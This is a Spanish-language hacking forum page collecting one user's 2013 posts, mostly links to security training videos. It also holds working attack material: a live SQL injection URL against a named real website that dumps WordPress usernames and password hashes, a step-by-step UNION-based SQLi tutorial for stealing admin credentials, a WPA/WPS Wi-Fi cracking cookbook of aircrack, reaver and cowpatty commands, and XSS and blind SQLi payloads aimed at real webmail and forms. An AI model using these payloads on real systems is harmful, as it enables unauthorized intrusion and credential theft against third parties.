Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.


Temas - TeNeX

Páginas: [1]
1
ASM / Linux Assembly Expert
« en: Agosto 05, 2013, 03:41:03 pm »
Buenas, este es un curso que estaba buscando, la verdad es que NO creo que este completo pues he visto isos de aprox 2 gigas, sin embargo aqui les dejo una serie de videos para que los desacarguen, si alguien tiene el iso completo estaría excelente lo compartiera

EDIT: Ya verifique y solo son los primeros 11 videos del modulo 1

http://videos.securitytube.net/Assembly-Primer-for-Hackers-%28Part-1%29-System-Organization.mp4
http://videos.securitytube.net/Assembly-Primer-for-Hackers-%28Part-2%29-Virtual-Memory-Organization.mp4
http://videos.securitytube.net/Assembly-Primer-for-Hackers-%28Part-3%29-GDB-Usage-Primer.mp4
http://videos.securitytube.net/Assembly-Primer-for-Hackers-%28Part-4%29-Hello-World.mp4
http://videos.securitytube.net/Assembly-Primer-for-Hackers-%28Part-5%29-Data-Types.mp4
http://videos.securitytube.net/Assembly-Primer-for-Hackers-%28Part-6%29-Moving-Data.mp4
http://videos.securitytube.net/Assembly-Primer-for-Hackers-%28Part-6%29-Working-with-Strings.mp4
http://videos.securitytube.net/Assembly-Primer-for-Hackers-%28Part-8%29-Unconditional-Branching.mp4
http://videos.securitytube.net/Assembly-Primer-for-Hackers-%28Part-9%29-Conditional-Branching.mp4
http://videos.securitytube.net/Assembly-Primer-for-Hackers-%28Part-10%29-Functions.mp4
http://videos.securitytube.net/Assembly-Primer-for-Hackers-%28Part-11%29-Functions-Stack.mp4

respecto al iso completo, estan dos torrents pero faltan seeders :(

Este torrent trae un compilado de algunos que son gratuitos
http://thepiratebay.sx/torrent/5968825/Securitytube.net_-_Open_Security_Training_Videos

y el que se supone esta full lo pueden googlear por II_AEH.7z  es un torrent pero como dije antes faltan seeders :(

2
Hacking ShowOff / Inyeccion sql
« en: Abril 28, 2013, 05:30:08 pm »
buenas, quiero compartir con ustedes como una inyección por get puede arrojar usuarios de worpress

http://www.yurem.com.mx/blog/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+%20select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29%20z%E2%80%8B0mbyak,7,8,9,10,11,12+from+wp_users--

arrojará en la propia web el usuario y el hash :) no pude subir el screen del sitio pero pruebenlo :)

3
Dudas y pedidos generales / [SOLUCIONADO] Duda XSS
« en: Febrero 10, 2013, 04:03:30 am »
Buenas, en un webmail, me enconré con unos xss que yo les digo "raros" uno es por post y el otro es por get... por post me imagino que debo usar un proxy para poder editar y enviar el xss por post... mi duda es que los marca en el evento "onmouseover" y si soy honesto creo que necesitaría algunos ejemplos.

intento por get failed:
Código: [Seleccionar]
https://login.server.net/index.php?clearcookies=1%27%3E%3Ca+onmouseover%3Dalert%28document.cookie%29%3Exxs%3C%2Fa%3E&app=wbe
y bueno acunetix dice esto:

- URL encoded GET input clearcookies was set to 1' onmouseover=prompt(981263) bad='

- URL encoded GET input clearcookies was set to 1' onmouseover=prompt(908631) bad='

- URL encoded GET input clearcookies was set to 1' onmouseover=prompt(907592) bad='


username

- URL encoded POST input username was set to tsklhfyf%40server.com.mx" onmouseover=prompt(910804) bad="

4
Pentesting / SQLi Básico
« en: Febrero 07, 2013, 10:50:43 pm »
Buenas, les traigo tambien este "mini tuto" que hice basado en unos videos que ví espero les sirva para ir iniciando

SQLI Beginners

- verificamos en la url de la victima si es vulnerable a sqli realizando una busqueda en su sitio web, y colocando una comilla al final www.victima.com/indice.php?id=10'  <- si nos arroja un resultado del tipo "verifique su sintaxis" significa que es vulnerable

- después de esto utilizando la sentencia "order by" sacaremos el num de columnas colocando un "-" despues del singo de "=", dos guiones al final de la sentencia, quedando de la siguiente manera: www.victima.com/indice.php?id=-10 order by [numero aleatorio]--

- enla parte de "numero aleatorio" irémos probando numeros como 10,11,12,13 y así sucesivamente, si no sucede nada intentamos con un numero mayor, hasta que obtengamos un error... lo cual significará que el numero de columnas será el numero anterior al error es decir:  si en 13 obtuvimos el error entonces el numero de columnas será 12

- ahora encontraremos los numeros vulnerables, esto lo lograremos con "union all select numero de columnas" y -- al final, recordemos que el numero de columnas lo obtuvimos en el paso anterior, quedando así:
www.victima.com/indice.php?id=-10 union all select 1,2,3,4,5,6,7,8,9,10,11,12--

- ya habrémos obtenido una serie de numeros... ¿como saber cual usar y para que usarlo? simple, el (o los) numero que aparezca como si fuera un enlace (subrayado) será el que nos permitirá inyectar

- ahora suponiendo que el numero vulnerable fue el 6, sacaremos ahora la version de la base de datos con "@@version" quedando así:
www.victima.com/indice.php?id=-10 union all select 1,2,3,4,5,@@version,7,8,9,10,11,12--

La version es inportante pues de ser menor a 5.0 tendríamos que usar bsqli

- ahora sacaremos el nombre de las tablas, para ello cambiaremos @@version por table_name  y despues del ultimo numero colocaremos "from information_schema.tables--"
www.victima.com/indice.php?id=-10 union all select 1,2,3,4,5,table_name,7,8,9,10,11,12 from information_schema.tables--

- en los resultados arrojados buscamos la tabla que nos interesa accesar, en este caso la de adminitrador... suponiendo qeu se llame "tbadmin" pasaremos a convertir el nombre de la tabla que nos interesa en ascii

www.victima.com/indice.php?id=-10 union all select 1,2,3,4,5,column_name,7,8,9,10,11,12 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)--

116 = t
98  = b
108 = l
97  = a
100 = d
109 = m
105 = i
110 = n

ya tenemos la información... ahora vamos a scar de las tablas "username" y "password" algunos datos

- vamos a escribir en lugar de "column_name" concat(username,0x3a,password) y despues del 12 vamos a escribir "from tbladmin"

www.victima.com/indice.php?id=-10 union all select 1,2,3,4,5,concat(username.0x3a,password),7,8,9,10,11,12 from tbladmin--

esto nos arrojará el usuario y el password

- ahora tenemos que encontrar la pagina del administrador para probar el login y el password

By TeNeX

5
Seguridad Wireless / wifi cook book
« en: Febrero 07, 2013, 08:40:53 pm »
Les traigo este aporte, es una recopilación que hice de varios ataques, procesamiento/generación de diccionarios  etc

Cracking WPA
* test with wireshark all your networks around with this filter
wps.wifi_protected_setup_state == 2

# airmon-ng start wlan0
# wireshark mon0&

Importar diccionario para WPA con airolib-ng
airolib-ng [db_name] [option [param]]

#airolib-ng crackwpa --import passwd /ruta/del/diccionario.txt
#airolib-ng crackwpa --import essid /archivo/con/el/essid
#airolib-ng crackwpa --stats
#airolib-ng crackwpa --clean all
#airolib-ng crackwpa --batch
#airolib-ng crackwpa --verify all
#aircrack-ng -r crackwpa archivo.cap

Cowpatty
*si el essid contiene espacios va entre comillas
*para hashear un diccionario se usa genpmk

#cowpatty -s [ESSID] -r archivo.cap -f /ruta/del/diccionario.txt
#cowpatty -s [ESSID] -r wpa.cap -d /ruta/del/diccionario/hasheado

Genpmk
*Generar el diccionario precomputado (hashes) para cowpatty, pyrt, etc
*Tener en cuenta que el argumento de -d podría no existir y se generaría

#genpmk -s [ESSID] -d /ruta/del/diccionario_en_Hash -f diccionario.txt
#genpmk -s [ESSID] -d [SSID] -f diccionario.txt

***Probar Contraseña***

# wpa_passphrase [ESSID] [password] > wpa.conf
# wpa_supplicant -Dwext -iwlan0 -c /ruta/del/wpa.conf

Pyrt

# cat [diccionario.txt] | sort | uniq | pw-inspector -m 8 -M 68 > dict.txt
#pyrt -e [essid] create_essid
#pyrt -f [diccionario.txt] import_passwords
#pyrt batchprocess
#aircrack-ng -w dict.txt file.cap
#airolib-ng testdb -import essid [essid]
#pyrt -e [essid] -f testdb export_hashdb
#aircrack-ng -r testdb file.cap


***DICCIONARIOS***

# cat [diccionario.txt] | sort | uniq | pw-inspector -m 8 -M 68 > dict.txt


pyrt -e [essid] -f [dictionary.txt] passthrough | cowpatty -d - -r [file.cap]

-s [essid]

Reaver

*To use reaver you need to check if victim has wps enabled and is chiper with

wpa
*then enable monitor mode and with mon0 or your new interface sniff with

wireshark and set filter to: wps.wifi_protected_setup_state == 2
*Then you got the victims with wps vuln
*Source: http://blog.andregasser.net/?p=243

# airmon-ng start wlan0
# airodump mon0  <- to find target
# reaver -i mon0 -b [Victim_BSSID] -vv


Fakeauth

# aireplay-ng --fakeauth 10 -e [ESSID]  mon0
# aireplay-ng --fakeauth 10 -e [ESSID] -h [my mac or Spoofed_MAC_ADDRESS] mon0

Si se captura un xor packet

# airodump-ng --channel 1 mon0 --bssid [AP_Victim_MAC] --write [name.cap]
# aireplay-ng --fakeauth 10 mon0 -e [ESSID] -y [FILE.XOR]

6
Dudas y pedidos generales / [SOLUCIONADO] Duda BSQLi
« en: Febrero 06, 2013, 06:15:03 pm »
Buenas, espero esten bien, tengo una duda... encontre un Blind SQLi pero es en un formulario, especificamente en un checkbox... mi duda es que... no me explico como se podría explotar...

el código del aspx es este

Código: [Seleccionar]
<div style="float:right; color:#404040;">
                                                 <input id="MainContent_chkAviso" type="checkbox" name="ctl00$MainContent$chkAviso" /><label for="MainContent_chkAviso">De acuerdo con el </label>
                                                 <a class="vwAviso" href="AvisoPrivacidad.pdf" title="Aviso de Privacidad">Aviso de Privacidad</a>

y acunetix dice esto:

URL encoded POST input ctl00%24MainContent%24chkAviso was set to 1'; waitfor delay '0:0:2.792' --


7
Seguridad Wireless / Wlan Security Videos
« en: Febrero 02, 2013, 03:54:29 am »
 :) Hola a todos, es la primera vez que posteo, y que mejor que para aportar algo!
les traigo el link del Securitytube Wifi Megapremier en lo personal estos cursos me agradan, he visto hasta el video 7 y va muy muy lento creo que puede abarcar mas pero es realmente "from scratch".

He estado buscando sus otros cursos como el de ASM, Python, Iphone, Metasploit etc, pero la verdad es que no he encontrado otros excepto el de metasploit tambien, pero bueno los demás si alguien tiene alguno seria bueno que lo shareara


Descarga directa ISO http://securitytube.aircrack-ng.org/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso

LOG DE MODERACION
ENLACE ROTO REMOVIDO 14.03.2015 CL0UDSWX

8
GNU/Linux / Tutoriales Ensamblador para pentest
« en: Enero 07, 2013, 03:06:23 am »
Buenas... este es mi primer aporte... es bastante chafa... en realidad pero bueno, estaba buscando el Securitytube Python Scripting Expert Dvd Download y encontré http://vfxfuture.com/to/securitytube-python-scripting-expert-dvd-download aqui una lista de cursos de programación, sinceramente me gustan los video tutoriales y me tope con el de ASM aunque no encontre el que quería :( pero bueno les comparto lo qu eencontré

 Assembley language for Penetration tester
Below are the useful resources to learn Assembley Language for pentesters to start learning Exploit writing

http://www.skullsecurity.org/wiki/index.php/Assembly


Linux Assembley

http://asm.sourceforge.net/

Programming From the Ground Up

http://download.savannah.gnu.org/releases-noredirect/pgubook/


Iczelion’s Win32 Assembly Homepage
http://win32assembly.online.fr/


Art of Assembly

http://homepage.mac.com/randyhyde/webster.cs.ucr.edu/index.html


first 5 chapters is enough

Intel Developer Manuals
http://www.intel.com/products/processor/manuals/


Assembly Language Primer for Hackers Videos

Assembly Primer for Hackers (Part 1) System Organization
http://securitytube.net/Assembly-Primer-for-Hackers-%28Part-1%29-System-Organization-video.aspx


Assembly Primer for Hackers (Part 2) Virtual Memory Organization
http://securitytube.net/Assembly-Primer-for-Hackers-%28Part-2%29-Virtual-Memory-Organization-video.aspx


Assembly Primer for Hackers (Part 3) GDB Usage Primer
http://securitytube.net/Assembly-Primer-for-Hackers-(Part-3)-GDB-Usage-Primer-video.aspx


Assembly Primer for Hackers (Part 4) Hello World
http://securitytube.net/Assembly-Primer-for-Hackers-(Part-4)-Hello-World-video.aspx


Assembly Primer for Hackers (Part 5) Data Types
http://securitytube.net/Assembly-Primer-for-Hackers-(Part-5)-Data-Types-video.aspx


Assembly Primer for Hackers (Part 6) Moving Data
http://securitytube.net/Assembly-Primer-for-Hackers-(Part-6)-Moving-Data-video.aspx


Assembly Primer for Hackers (Part 7) Working with Strings
http://securitytube.net/Assembly-Primer-for-Hackers-(Part-7)-Working-with-Strings-video.aspx


http://securitytube.net/Assembly-Primer-for-Hackers-(Part-8)-Unconditional-Branching-video.aspx


Assembly Primer for Hackers (Part 9) Conditional Branching
http://securitytube.net/Assembly-Primer-for-Hackers-(Part-9)-Conditional-Branching-video.aspx


Assembly Primer for Hackers (Part 10) Functions
http://securitytube.net/Assembly-Primer-for-Hackers-(Part-10)-Functions-video.aspx


Assembly Primer for Hackers (Part 11) Functions Stack
http://securitytube.net/Assembly-Primer-for-Hackers-(Part-11)-Functions-Stack-video.aspx


fuente: http://r00tsec.blogspot.mx/2011/05/assembley-lanugage-for-penetration.html aqui
y aqu ila fuente de la fuente: http://punter-infosec.com/category/assembley-language

estoy descargando el SMFE (SecurityTube Metasploit Framework Expert) el cual tambien comparto
http://dvd.securitytube.net/SMFE-Community.zip aqui para ustedes

Páginas: [1]